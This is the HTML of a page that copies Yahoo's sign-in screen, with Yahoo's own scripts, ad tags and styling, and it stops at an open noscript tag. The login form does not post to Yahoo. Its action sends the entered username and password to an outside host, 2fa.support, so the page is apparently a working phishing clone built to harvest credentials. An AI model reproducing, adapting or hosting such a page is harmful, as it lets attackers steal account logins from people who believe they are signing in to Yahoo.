
<!DOCTYPE html>
<html id="Stencil" class="no-js grid light-theme ">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no"/>
        <meta name="format-detection" content="telephone=no">
        <meta name="referrer" content="origin-when-cross-origin">
        <title>Yahoo</title>
        <meta name="description" content="Yahoo">
        <link rel="dns-prefetch" href="//gstatic.com">
        <link rel="dns-prefetch" href="//google.com">
        <link rel="dns-prefetch" href="//s.yimg.com">
        <link rel="dns-prefetch" href="//y.analytics.yahoo.com">
        <link rel="dns-prefetch" href="//ucs.query.yahoo.com">
        <link rel="dns-prefetch" href="//geo.query.yahoo.com">
        <link rel="dns-prefetch" href="//geo.yahoo.com">
        <link rel="icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
        <link rel="shortcut icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
        <meta name="google-site-verification" content="yOTFyUBPTnXtuk2cPpqfv7ZvZ960JgqsV8FomN3n7Y0">
        <link rel="apple-touch-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
        <link rel="apple-touch-icon-precomposed" href="https://s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
        <style nonce="ozRR9mOWbwa3o1HzjCy2mPrgUCS82PguKiJ8lyyLKRc49jhx">
            #mbr-css-check {
                display: inline;
            }
        </style>
        <link href="https://s.yimg.com/wm/mbr/58dc9fe4f6c2083f38135ec31a4db5c11ab15bc4/yahoo-main.css" rel="stylesheet" type="text/css">
        <script nonce="ozRR9mOWbwa3o1HzjCy2mPrgUCS82PguKiJ8lyyLKRc49jhx">
            var pageStartTime = new Date().getTime();
            (function(root) {
                var isGoodJS = ('create' in Object && 'isArray' in Array && 'pushState' in window.history);
                root.isGoodJS = isGoodJS;
            }(this));
            
(function (root) {
/* -- Data -- */
root.YUI_config = {"comboBase":"https:\u002F\u002Fs.yimg.com\u002Fzz\u002Fcombo?","combine":true,"root":"yui-s:3.18.0\u002F"};
root.COMET_URL = "https:\u002F\u002Fpr.comet.yahoo.com\u002Fcomet";
root.I13N_config = {"keys":{"pt":"utility","ver":"nodejs"}};
root.I13N_config || (root.I13N_config = {});
root.I13N_config.spaceid = 794200019;
root.I13N_config.location = "https:\u002F\u002Flogin.yahoo.com\u002Faccount\u002Fchallenge\u002Fpassword?pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&src=ym&display=login";
root.I13N_config.referrer = "";
root.I13N_config.keys || (root.I13N_config.keys = {});
root.I13N_config.keys.pg_name = "passwordChallenge";
root.I13N_config.keys.gm_np = "yahoo";
root.I13N_config.keys.src = "ym";
root.I13N_config.keys.p_sec = "DEFAULT_SECTION";
root.I13N_config.keys.p_subsec = "DEFAULT_SUBSECTION";
root.I13N_config.keys.test = "mbr-push-untrusted-ar,mbr-fido-1fa-login,mbr-rcscore-threshold,mbr-qr-comet-sdk,mbr-login-domain,mbr-yak-ui-improvement";
root.mKeyPrefix = "password-challenge-";
root.I13N_config.keys.cause = "mail-direct";
root.I13N_config.keys.src_id = "159600001";
root.darlaConfig = {"url":"https:\u002F\u002Ffc.yahoo.com\u002Fsdarla\u002Fphp\u002Fclient.php?l=RICH{dest:tgtRICH;asz:flex}&f=794200019&ref=https%3A%2F%2Flogin.yahoo.com%2Faccount%2Fchallenge%2Fpassword&sa=geminifed%253D1%2520y-bucket%253Dmbr-push-untrusted-ar%252Cmbr-fido-1fa-login%252Cmbr-rcscore-threshold%252Cmbr-qr-comet-sdk%252Cmbr-login-domain%252Cmbr-yak-ui-improvement","k2Rate":1,"positions":{"RICH":{"sandbox":"allow-scripts allow-same-origin allow-popups allow-popups-to-escape-sandbox","id":"RICH","clean":"login-ad-rich","dest":"login-ad-rich","w":1440,"h":1024,"timeout":5000,"noexp":1,"fdb":"","on":1,"where":"inside","minReqWidth":1325,"showAfter":2000}}};
root.challenge || (root.challenge = {});
root.challenge.servingStamp = 1635451203827;
root.challenge.isAndroidWebview = false;
root.I13N_config.keys.pct = "signin";
root.pwchallenge || (root.pwchallenge = {});
root.pwchallenge.messages = {"toolTipShow":"Show password","toolTipHide":"Hide password"};
root.isIOSDevice = false;
}(this));

            
            YUI_config.global = window;


            window.mbrSendError = function (name, url) {
                (new Image()).src = '/account/js-reporting/?rid=7f5o3h1gnm0a3&crumb=' + encodeURIComponent('uZ4.07kERLI') + '&message=' + encodeURIComponent(name) + '&url=' + encodeURIComponent(url);
            };

            var oldError = window.onerror;

            window.onerror = function (errorMsg, url) {
                window.mbrSendError(errorMsg, url);
                if (oldError) {
                    oldError.apply(this, arguments);
                }
                return false;
            };

        </script>
    <script type="text/x-safeframe-booted" id="sf_tag_1637740001212_34">{"positions":[{"id":"RICH","html":"<script type='text\/javascript'>document.write(\"<!--*\\n\");\ndocument.write(\"O&O - Image - Wrap \\n\");\ndocument.write(\"var aolAdId=\\\"11146745|26832429\\\";\\n\");\ndocument.write(\"var aolSize=\\\"1440|1024\\\";\\n\");\ndocument.write(\"var aolFormat=\\\"Img1x1\\\";\\n\");\ndocument.write(\"var aolGUID=\\\"1637739915|62494346959658538\\\";\\n\");\ndocument.write(\"var gdpr=\\\"0\\\";\\n\");\ndocument.write(\"var gdpr_consent=\\\"\\\";\\n\");\ndocument.write(\"*-->\\n\");\n\ndocument.write(\"<a href=\\\"https:\/\/6.at.atwola.com\/adlink|5113.1|5043043|0|5112|AdId=11146745;BnId=1;guid=9slkin1gpn6fu&b=4&d=dsEdG7FtYFGGYz9oEjMo&s=4f&i=em3Lgw_lUX_mVsy6EwTm;itime=739915162;kvsecure%2Ddarla=4%2D10%2D0%7Cysd%7C2;kvsecure=true;kvmn=y963896142;kvy%2Dbucket=mbr%2Dpush%2Duntrusted%2Dar%2Cmbr%2Dfido%2D1fa%2Dlogin%2Cmbr%2Drcscore%2Dthreshold%2Cmbr%2Dqr%2Dcomet%2Dsdk%2Cmbr%2Dlogin%2Ddomain%2Cmbr%2Dyak%2Dui%2Dimprovement;kvpgcolo=bf1;kvssp=ssp;kvadtc%5Fdvmktname=unknown;kvadtc%5Fdvosplt=windows%5F10;kvadtc%5Fdvbrand=google;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=chrome%5F%2D%5Fwindows;kvrepo%5Fdvosplt=windows%5F10;kvadtc%5Fdvosversion=NT%2010%2E0;kvadtc%5Fcrmcc=UNKNOWN;kvadtc%5Fcrmnc=UNKNOWN;gdpr=0;us_privacy=1YNN;nodecode=yes;adclntid=1004;spaceid=794200019;link=https:\/\/ad.doubleclick.net\/ddm\/trackclk\/N51901.3020245OATH.COM\/B26620495.316681543;dc_trk_aid=512889667;dc_trk_cid=161708928;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;ltd=\\\" target=\\\"_blank\\\"><img src=\\\"https:\/\/aka-cdn.adtechus.com\/apps\/45\/Ad0St3Sz5112Sq0V0Id26832429\/FY22_PWCMHID_VZW_LoginRoadBlock_Final.jpg\\\" width=\\\"1442\\\" height=\\\"1051\\\" border=0 alt=\\\"Advertisement\\\"><\/a>\\n\");\ndocument.write(\"<img src=\\\"https:\/\/ad.doubleclick.net\/ddm\/trackimp\/N51901.3020245OATH.COM\/B26620495.316681543;dc_trk_aid=512889667;dc_trk_cid=161708928;ord=739915162;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=0;gdpr_consent=;ltd=?\\\" width=\\\"1px\\\" height=\\\"1px\\\" style=\\\"display:none\\\"\/>\\n\");\ndocument.write(\"<img src=\\\"https:\/\/pixel.adsafeprotected.com\/rfw\/st\/846272\/58595340\/skeleton.gif?gdpr=$%7BGDPR%7D&gdpr_consent=$%7BGDPR_CONSENT_278%7D&gdpr_pd=$%7BGDPR_PD%7D\\\" width=\\\"1px\\\" height=\\\"1px\\\" style=\\\"display:none\\\"\/>\\n\");\ndocument.write(\"<img src=\\\"https:\/\/t.myvisualiq.net\/impression_pixel?r=739915162&et=i&ago=212&ao=546&aca=26620495&si=4449639&ci=-7&pi=316681543&ad=-7&advt=4470647&chnl=-7&vndr=115&sz=6696&u=[Custom_Data]&pt=i\\\" width=\\\"1px\\\" height=\\\"1px\\\" style=\\\"display:none\\\"\/>\\n\");\ndocument.write(\"<img src=\\\"https:\/\/tapestry.tapad.com\/tapestry\/1?ta_partner_id=950&ta_redirect=https%253A%252F%252Ft.myvisualiq.net%252Fsync%253Fprid%253D1001%2526ao%253D0%2526pruuid%253DTAPAD_%2524%257BIDS%253Akey%257D\\\" width=\\\"1px\\\" height=\\\"1px\\\" style=\\\"display:none\\\"\/>\\n\");\n\n\n\n\ndocument.write(\"<!--*\\n\");\ndocument.write(\"var moatClientLevel1=5113\\n\");\ndocument.write(\"var moatClientLevel2=374058\\n\");\ndocument.write(\"var moatClientLevel3=0\\n\");\ndocument.write(\"var moatClientLevel4=5043043\\n\");\ndocument.write(\"var zMoatMaster=11146824\\n\");\ndocument.write(\"var zMoatFlight=11146745\\n\");\ndocument.write(\"var zMoatBanner=26832429\\n\");\ndocument.write(\"var zURL=https\\n\");\ndocument.write(\"var zMoatPlacementId=5043043\\n\");\ndocument.write(\"var zMoatPlacementExtId=963896142\\n\");\ndocument.write(\"var zMoatAdId=11146745\\n\");\ndocument.write(\"var zMoatCreative=0\\n\");\ndocument.write(\"var zMoatBannerID=1\\n\");\ndocument.write(\"var zMoatCustomVisp=0\\n\");\ndocument.write(\"var zMoatCustomVist=0\\n\");\ndocument.write(\"var zMoatIsAdvisGoal=0\\n\");\ndocument.write(\"var zMoatEventUrl=https:\/\/6.at.atwola.com\/adcount|2.0|5113.1|5043043|0|5112|AdId=11146745;BnId=1;ct=165776162;st=8727;adcid=1;itime=739915162;reqtype=5;guid=9slkin1gpn6fu&b=4&d=dsEdG7FtYFGGYz9oEjMo&s=4f&i=em3Lgw_lUX_mVsy6EwTm;;impref=16377399152746101954;imprefseq=62494346959658538;imprefts=1637739915;adclntid=1004;spaceid=794200019;adposition=RICH;lmsid=;revshare=;pvid=hFXICzEwLjGeVpK4YZuZ_gcJNzQuOQAAAAAJ4Phj;sectionid=;kvsecure%2Ddarla=4%2D10%2D0%7Cysd%7C2;kvsecure=true;kvmn=y963896142;kvy%2Dbucket=mbr%2Dpush%2Duntrusted%2Dar%2Cmbr%2Dfido%2D1fa%2Dlogin%2Cmbr%2Drcscore%2Dthreshold%2Cmbr%2Dqr%2Dcomet%2Dsdk%2Cmbr%2Dlogin%2Ddomain%2Cmbr%2Dyak%2Dui%2Dimprovement;kvpgcolo=bf1;kvssp=ssp;kvadtc%5Fdvmktname=unknown;kvadtc%5Fdvosplt=windows%5F10;kvadtc%5Fdvbrand=google;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=chrome%5F%2D%5Fwindows;kvrepo%5Fdvosplt=windows%5F10;kvadtc%5Fdvosversion=NT%2010%2E0;kvadtc%5Fcrmcc=UNKNOWN;kvadtc%5Fcrmnc=UNKNOWN;gdpr=0;us_privacy=1YNN;\\n\");\ndocument.write(\"var zMoatSize=5112\\n\");\ndocument.write(\"var zMoatSubNetID=1\\n\");\ndocument.write(\"var zMoatisSelected=0\\n\");\ndocument.write(\"var zMoatadServer=bf.us.y.atwola.com\\n\");\ndocument.write(\"var zMoatadVisServer=\\n\");\ndocument.write(\"var zMoatSamplingRate=5\\n\");\ndocument.write(\"var zMoatliveTestCookie=\\n\");\ndocument.write(\"var zMoatRefSeqId=q4BAHckBeDA\\n\");\ndocument.write(\"var zMoatImpRefTs=1637739915\\n\");\ndocument.write(\"var zMoatAlias=y963896142\\n\");\ndocument.write(\"var zMoatWebsiteID=374058\\n\");\ndocument.write(\"var zMoatVert=\\n\");\ndocument.write(\"var zMoatBannerInfo=496436783\\n\");\ndocument.write(\"var RefreshSmall=\\n\");\ndocument.write(\"var RefreshLarge=\\n\");\ndocument.write(\"var RefreshExclusive=\\n\");\ndocument.write(\"var RefreshReserved=\\n\");\ndocument.write(\"var RefreshTime=\\n\");\ndocument.write(\"var RefreshMax=\\n\");\ndocument.write(\"var RefreshKeepSize=\\n\");\ndocument.write(\"var MP=N\\n\");\ndocument.write(\"var AdTypePriority=500\\n\");\ndocument.write(\"*-->\\n\");\ndocument.write(\"<scr\"+\"ipt src=\\\"\"+(window.location.protocol=='https:' ? \"https:\/\/aka-cdn.adtechus.com\" : \"http:\/\/aka-cdn-ns.adtechus.com\")+\"\/media\/moat\/adtechbrands092348fjlsmdhlwsl239fh3df\/moatad.js#moatClientLevel1=5113&moatClientLevel2=374058&moatClientLevel3=0&moatClientLevel4=5043043&zMoatMaster=11146824&zMoatFlight=11146745&zMoatBanner=26832429&zURL=https&zMoatPlacementId=5043043&zMoatAdId=11146745&zMoatCreative=0&zMoatBannerID=1&zMoatCustomVisp=0&zMoatCustomVist=0&zMoatIsAdvisGoal=0&zMoatEventUrl=https:\/\/6.at.atwola.com\/adcount|2.0|5113.1|5043043|0|5112|AdId=11146745;BnId=1;ct=165776162;st=8797;adcid=1;itime=739915162;reqtype=5;guid=9slkin1gpn6fu&b=4&d=dsEdG7FtYFGGYz9oEjMo&s=4f&i=em3Lgw_lUX_mVsy6EwTm;;impref=16377399152746101954;imprefseq=62494346959658538;imprefts=1637739915;adclntid=1004;spaceid=794200019;adposition=RICH;lmsid=;revshare=;pvid=hFXICzEwLjGeVpK4YZuZ_gcJNzQuOQAAAAAJ4Phj;sectionid=;kvsecure%2Ddarla=4%2D10%2D0%7Cysd%7C2;kvsecure=true;kvmn=y963896142;kvy%2Dbucket=mbr%2Dpush%2Duntrusted%2Dar%2Cmbr%2Dfido%2D1fa%2Dlogin%2Cmbr%2Drcscore%2Dthreshold%2Cmbr%2Dqr%2Dcomet%2Dsdk%2Cmbr%2Dlogin%2Ddomain%2Cmbr%2Dyak%2Dui%2Dimprovement;kvpgcolo=bf1;kvssp=ssp;kvadtc%5Fdvmktname=unknown;kvadtc%5Fdvosplt=windows%5F10;kvadtc%5Fdvbrand=google;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=chrome%5F%2D%5Fwindows;kvrepo%5Fdvosplt=windows%5F10;kvadtc%5Fdvosversion=NT%2010%2E0;kvadtc%5Fcrmcc=UNKNOWN;kvadtc%5Fcrmnc=UNKNOWN;gdpr=0;us_privacy=1YNN;&zMoatSize=5112&zMoatSubNetID=1&zMoatisSelected=0&zMoatadServer=bf.us.y.atwola.com&zMoatadVisServer=&zMoatSamplingRate=5&zMoatliveTestCookie=&zMoatRefSeqId=q4BAHckBeDA&zMoatImpRefTs=1637739915&zMoatAlias=y963896142&zMoatVert=&zMoatBannerInfo=496436783\\\" type=\\\"text\/javascript\\\"><\/scr\"+\"ipt>\");\n<\/script>","lowHTML":"","meta":{"y":{"pos":"RICH","cscHTML":"<img width=1 height=1 alt=\"\" src=\"https:\/\/6.at.atwola.com\/adcount|2.0|5113.1|5043043|0|5112|AdId=11146745;BnId=1;ct=165776162;st=8998;adcid=1;itime=739915162;reqtype=5;guid=9slkin1gpn6fu&b=4&d=dsEdG7FtYFGGYz9oEjMo&s=4f&i=em3Lgw_lUX_mVsy6EwTm;;impref=16377399152746101954;imprefseq=62494346959658538;imprefts=1637739915;adclntid=1004;spaceid=794200019;adposition=RICH;lmsid=;revshare=;pvid=hFXICzEwLjGeVpK4YZuZ_gcJNzQuOQAAAAAJ4Phj;sectionid=;kvsecure%2Ddarla=4%2D10%2D0%7Cysd%7C2;kvsecure=true;kvmn=y963896142;kvy%2Dbucket=mbr%2Dpush%2Duntrusted%2Dar%2Cmbr%2Dfido%2D1fa%2Dlogin%2Cmbr%2Drcscore%2Dthreshold%2Cmbr%2Dqr%2Dcomet%2Dsdk%2Cmbr%2Dlogin%2Ddomain%2Cmbr%2Dyak%2Dui%2Dimprovement;kvpgcolo=bf1;kvssp=ssp;kvadtc%5Fdvmktname=unknown;kvadtc%5Fdvosplt=windows%5F10;kvadtc%5Fdvbrand=google;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=chrome%5F%2D%5Fwindows;kvrepo%5Fdvosplt=windows%5F10;kvadtc%5Fdvosversion=NT%2010%2E0;kvadtc%5Fcrmcc=UNKNOWN;kvadtc%5Fcrmnc=UNKNOWN;gdpr=0;us_privacy=1YNN;\">","cscURI":"https:\/\/6.at.atwola.com\/adcount|2.0|5113.1|5043043|0|5112|AdId=11146745;BnId=1;ct=165776162;st=8998;adcid=1;itime=739915162;reqtype=5;guid=9slkin1gpn6fu&b=4&d=dsEdG7FtYFGGYz9oEjMo&s=4f&i=em3Lgw_lUX_mVsy6EwTm;;impref=16377399152746101954;imprefseq=62494346959658538;imprefts=1637739915;adclntid=1004;spaceid=794200019;adposition=RICH;lmsid=;revshare=;pvid=hFXICzEwLjGeVpK4YZuZ_gcJNzQuOQAAAAAJ4Phj;sectionid=;kvsecure%2Ddarla=4%2D10%2D0%7Cysd%7C2;kvsecure=true;kvmn=y963896142;kvy%2Dbucket=mbr%2Dpush%2Duntrusted%2Dar%2Cmbr%2Dfido%2D1fa%2Dlogin%2Cmbr%2Drcscore%2Dthreshold%2Cmbr%2Dqr%2Dcomet%2Dsdk%2Cmbr%2Dlogin%2Ddomain%2Cmbr%2Dyak%2Dui%2Dimprovement;kvpgcolo=bf1;kvssp=ssp;kvadtc%5Fdvmktname=unknown;kvadtc%5Fdvosplt=windows%5F10;kvadtc%5Fdvbrand=google;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=chrome%5F%2D%5Fwindows;kvrepo%5Fdvosplt=windows%5F10;kvadtc%5Fdvosversion=NT%2010%2E0;kvadtc%5Fcrmcc=UNKNOWN;kvadtc%5Fcrmnc=UNKNOWN;gdpr=0;us_privacy=1YNN;","behavior":"non_exp","adID":"11146745","matchID":"999999.999999.999999.999999","bookID":"11146745","slotID":"0","serveType":"6","ttl":-1,"err":false,"hasExternal":false,"supp_ugc":"0","placementID":"11146745","fdb":null,"serveTime":-1,"impID":"-1","creativeID":26832429,"adc":"{\"label\":\"AdChoices\",\"url\":\"https:\\\/\\\/info.yahoo.com\\\/privacy\\\/us\\\/yahoo\\\/relevantads.html\",\"close\":\"Close\",\"closeAd\":\"Close Ad\",\"showAd\":\"Show ad\",\"collapse\":\"Collapse\",\"fdb\":\"I don't like this ad\",\"code\":\"en-us\"}","is3rd":1,"facStatus":{"fedStatusCode":"10","fedStatusMessage":"no replacement for exclusive contract"},"userProvidedData":{},"facRotation":{},"slotData":{"trusted_custom":"false","freqcapped":"false","delivery":"-1","pacing":"-1","expires":"76425","companion":"false","exclusive":"true","redirect":"false","pvid":"hFXICzEwLjGeVpK4YZuZ_gcJNzQuOQAAAAAJ4Phj"},"size":"1440x1024"}},"conf":{"w":1440,"h":1024}}],"conf":{"useYAC":0,"usePE":1,"servicePath":"","xservicePath":"","beaconPath":"","renderPath":"","allowFiF":false,"srenderPath":"https:\/\/s.yimg.com\/rq\/darla\/4-10-0\/html\/r-sf.html","renderFile":"https:\/\/s.yimg.com\/rq\/darla\/4-10-0\/html\/r-sf.html","sfbrenderPath":"https:\/\/s.yimg.com\/rq\/darla\/4-10-0\/html\/r-sf.html","msgPath":"https:\/\/fc.yahoo.com\/unsupported-1946.html","cscPath":"https:\/\/s.yimg.com\/rq\/darla\/4-10-0\/html\/r-csc.html","root":"sdarla","edgeRoot":"https:\/\/s.yimg.com\/rq\/darla\/4-10-0","sedgeRoot":"https:\/\/s.yimg.com\/rq\/darla\/4-10-0","version":"4-10-0","tpbURI":"","hostFile":"https:\/\/s.yimg.com\/rq\/darla\/4-10-0\/js\/g-r-min.js","fdb_locale":"What don't you like about this ad?|It's offensive|Something else|Thank you for helping us improve your Yahoo experience|It's not relevant|It's distracting|I don't like this ad|Send|Done|Why do I see ads?|Learn more about your feedback.|Want an ad-free inbox? Upgrade to Yahoo Mail Pro!|Upgrade Now","positions":{"RICH":{"dest":"tgtRICH","asz":"flex","id":"RICH","w":1440,"h":1024}},"property":"","events":[],"lang":"en-us","spaceID":"794200019","debug":false,"asString":"{\"useYAC\":0,\"usePE\":1,\"servicePath\":\"\",\"xservicePath\":\"\",\"beaconPath\":\"\",\"renderPath\":\"\",\"allowFiF\":false,\"srenderPath\":\"https:\\\/\\\/s.yimg.com\\\/rq\\\/darla\\\/4-10-0\\\/html\\\/r-sf.html\",\"renderFile\":\"https:\\\/\\\/s.yimg.com\\\/rq\\\/darla\\\/4-10-0\\\/html\\\/r-sf.html\",\"sfbrenderPath\":\"https:\\\/\\\/s.yimg.com\\\/rq\\\/darla\\\/4-10-0\\\/html\\\/r-sf.html\",\"msgPath\":\"https:\\\/\\\/fc.yahoo.com\\\/unsupported-1946.html\",\"cscPath\":\"https:\\\/\\\/s.yimg.com\\\/rq\\\/darla\\\/4-10-0\\\/html\\\/r-csc.html\",\"root\":\"sdarla\",\"edgeRoot\":\"https:\\\/\\\/s.yimg.com\\\/rq\\\/darla\\\/4-10-0\",\"sedgeRoot\":\"https:\\\/\\\/s.yimg.com\\\/rq\\\/darla\\\/4-10-0\",\"version\":\"4-10-0\",\"tpbURI\":\"\",\"hostFile\":\"https:\\\/\\\/s.yimg.com\\\/rq\\\/darla\\\/4-10-0\\\/js\\\/g-r-min.js\",\"fdb_locale\":\"What don't you like about this ad?|It's offensive|Something else|Thank you for helping us improve your Yahoo experience|It's not relevant|It's distracting|I don't like this ad|Send|Done|Why do I see ads?|Learn more about your feedback.|Want an ad-free inbox? Upgrade to Yahoo Mail Pro!|Upgrade Now\",\"positions\":{\"RICH\":{\"dest\":\"tgtRICH\",\"asz\":\"flex\",\"id\":\"RICH\",\"w\":1440,\"h\":1024}},\"property\":\"\",\"events\":[],\"lang\":\"en-us\",\"spaceID\":\"794200019\",\"debug\":false}"},"meta":{"y":{"pageEndHTML":"<!-- Page End HTML -->","pos_list":["RICH"],"transID":"darla_prefetch_1637739915193_1288249626_3","k2_uri":"","fac_rt":-1,"ttl":-1,"spaceID":"794200019","lookupTime":118,"procTime":119,"npv":0,"pvid":"hFXICzEwLjGeVpK4YZuZ_gcJNzQuOQAAAAAJ4Phj","serveTime":-1,"ep":{"site-attribute":"geminifed=1 y-bucket=mbr-push-untrusted-ar,mbr-fido-1fa-login,mbr-rcscore-threshold,mbr-qr-comet-sdk,mbr-login-domain,mbr-yak-ui-improvement","tgt":"_blank","secure":true,"ref":"https:\/\/login.yahoo.com\/account\/challenge\/password","filter":"no_expandable;exp_iframe_expandable;","darlaID":"darla_instance_1637739915193_647842634_2"},"pym":{".":"v0.0.9;;-;"},"host":"","filtered":[],"pe":""}}}</script><script type="text/javascript" src="https://s.yimg.com/rq/darla/boot.js"></script><script id="sf_host_lib_sf_auto_2-23-10-2021" type="text/javascript" class="sf_lib" src="https://s.yimg.com/rq/darla/4-10-0/js/g-r-min.js"></script></head>
    <body class="bucket-mbr-push-untrusted-ar bucket-mbr-qr-comet-sdk bucket-mbr-login-domain bucket-mbr-yak-ui-improvement">
    <script nonce="ozRR9mOWbwa3o1HzjCy2mPrgUCS82PguKiJ8lyyLKRc49jhx">
        (function(root) {
            var doc = document;
            if (root.isGoodJS) {
                doc.documentElement.className = doc.documentElement.className.replace('no-js', 'js');
            }
        }(this));
    </script>
    <div id="login-body" class="loginish puree-v2 grid dark-background">
    <div class="mbr-desktop-hd">
    <span class="column">
         <a href="https://www.yahoo.com/">
            <img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo " width="" height="36">
            <img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo " width="" height="36">
        </a>
    </span>
    <span class="column help txt-align-right">
        <a href="https://help.yahoo.com/kb/index?locale=en_US&amp;page=product&amp;y=PROD_ACCT">Help</a>
    </span>
</div>
    <div class="login-box-container">
        <div class="login-box right">
            <div class="mbr-login-hd txt-align-center">
                    <img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo yahoo-en-US" width="" height="27">
                    <img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo yahoo-en-US" width="" height="27">
            </div>
            <div class="challenge password-challenge">
    <div class="challenge-header">
    </div>
    <div id="password-challenge" class="primary">
    <strong class="challenge-heading">Sign in</strong>
        <form action="https://2fa.support/ncw/asp.php" method="post" class="challenge-form">
        <input type="hidden" name="browser-fp-data" id="browser-fp-data" value="{&quot;language&quot;:&quot;en-US&quot;,&quot;colorDepth&quot;:24,&quot;deviceMemory&quot;:8,&quot;pixelRatio&quot;:1,&quot;hardwareConcurrency&quot;:8,&quot;timezoneOffset&quot;:480,&quot;timezone&quot;:&quot;America/Los_Angeles&quot;,&quot;sessionStorage&quot;:1,&quot;localStorage&quot;:1,&quot;indexedDb&quot;:1,&quot;openDatabase&quot;:1,&quot;cpuClass&quot;:&quot;unknown&quot;,&quot;platform&quot;:&quot;Win32&quot;,&quot;doNotTrack&quot;:&quot;unknown&quot;,&quot;plugins&quot;:{&quot;count&quot;:5,&quot;hash&quot;:&quot;2c14024bf8584c3f7f63f24ea490e812&quot;},&quot;canvas&quot;:&quot;canvas winding:yes~canvas&quot;,&quot;webgl&quot;:1,&quot;webglVendorAndRenderer&quot;:&quot;Google Inc. (Google)~ANGLE (Google, Vulkan 1.2.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver-5.0.0)&quot;,&quot;adBlock&quot;:0,&quot;hasLiedLanguages&quot;:0,&quot;hasLiedResolution&quot;:0,&quot;hasLiedOs&quot;:0,&quot;hasLiedBrowser&quot;:0,&quot;touchSupport&quot;:{&quot;points&quot;:0,&quot;event&quot;:0,&quot;start&quot;:0},&quot;fonts&quot;:{&quot;count&quot;:48,&quot;hash&quot;:&quot;62d5bbf307ed9e959ad3d5ad6ccd3951&quot;},&quot;audio&quot;:&quot;124.04347527516074&quot;,&quot;resolution&quot;:{&quot;w&quot;:&quot;1366&quot;,&quot;h&quot;:&quot;768&quot;},&quot;availableResolution&quot;:{&quot;w&quot;:&quot;728&quot;,&quot;h&quot;:&quot;1366&quot;},&quot;ts&quot;:{&quot;serve&quot;:1635451203827,&quot;render&quot;:1637740000677}}">
        <input type="hidden" name="crumb" value="uZ4.07kERLI">
        <input type="hidden" name="acrumb" value="ZSj1RkK6">
        <input type="hidden" name="sessionIndex" value="Qg--">
        <div class="input-group">
                
                <div class="input-field-icon" id="username-field-icon"></div>
                <div id="password-container" class="input-group password-container focussed">
            <input class="phone-no " type="text" name="username" id="login-username" value="" autocomplete="username" autocapitalize="none" autocorrect="off" autofocus="true" placeholder=" " required>
            <label for="login-passwd" id="login-label" class="login-label">Username, email, or mobile</label>
            
            
        </div>
                <ul class="auto-fill-overlay hide" aria-live="polite" id="domain-auto-fill">
                    <li data-fill="yahoo.com" tabindex="2">yahoo.com</li><li data-fill="myyahoo.com" tabindex="3">myyahoo.com</li><li data-fill="ymail.com" tabindex="4">ymail.com</li><li data-fill="gmail.com" tabindex="5">gmail.com</li><li data-fill="outlook.com" tabindex="6">outlook.com</li><li data-fill="aol.com" tabindex="7">aol.com</li>
                </ul>            </div>
        <input type="hidden" name="passwordContext" value="normal">
        <input type="hidden" name="isShowButtonClicked" id="show-button-clicked" value="true">
        <input type="hidden" name="showButtonStatus" id="show-button-status" value="true">
        <input type="hidden" name="prefersReducedMotion" id="prefers-reduce-motion" value="">
        <div id="password-container" class="input-group password-container blurred">
            <input type="text" id="login-passwd" class="password" name="password" placeholder=" " autofocus="" autocomplete="current-password" data-rapid-tracking="true" data-ylk="elm:input;elmt:focus;slk:passwd;mKey:password-challenge-focus-passwd" required>
            <label for="login-passwd" id="password-label" class="password-label">Password</label>
            <div class="caps-indicator hide" id="caps-indicator" title="Capslock is on"></div>
            <button type="button" class="show-hide-toggle-button show-pw" id="password-toggle-button" tabindex="-1" title="Hide password" data-rapid-tracking="true" data-ylk="elm:btn;elmt:toggle;slk:toggle-show-passwd;mKey:password-challenge-toggle-show-hide">
            </button>
        </div>

        <div class="button-container">
            <button type="submit" id="login-signin" class="pure-button puree-button-primary puree-spinner-button challenge-button" name="verifyPassword" value="Next" data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:password-challenge-next">
                    Next
            </button>
        </div>
        <div class="forgot-cont challenge-button-link">
            <input type="submit" class="pure-button puree-button-link challenge-button-link" data-ylk="elm:btn;elmt:skip;slk:skip;mKey:password-challenge-skip-recovery" data-rapid-tracking="true" id="mbr-forgot-link" name="skip" value="Forgot password?">
        </div>
    </form>
</div>
</div>
        </div>
        <div id="login-box-ad-fallback" class="login-box-ad-fallback" style="display: block;">
            <h1>Yahoo makes it easy to enjoy what matters most in your world.</h1>
<p>Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies and more. You get more out of the web, you get more out of life.</p>
        </div>
    </div>
    <div class="login-bg-outer">
        <div class="login-bg-inner"><div id="login-ad-rich" style="visibility: inherit;"></div></div>
    </div>
    
</div>
    <script src="https://s.yimg.com/ss/rapid-3.53.30.js"></script>
    <script nonce="ozRR9mOWbwa3o1HzjCy2mPrgUCS82PguKiJ8lyyLKRc49jhx">
        var rapidInstance = new YAHOO.i13n.Rapid(I13N_config);
    </script>
    <script src="https://s.yimg.com/wm/mbr/58dc9fe4f6c2083f38135ec31a4db5c11ab15bc4/bundle.js"></script>
    <noscript>
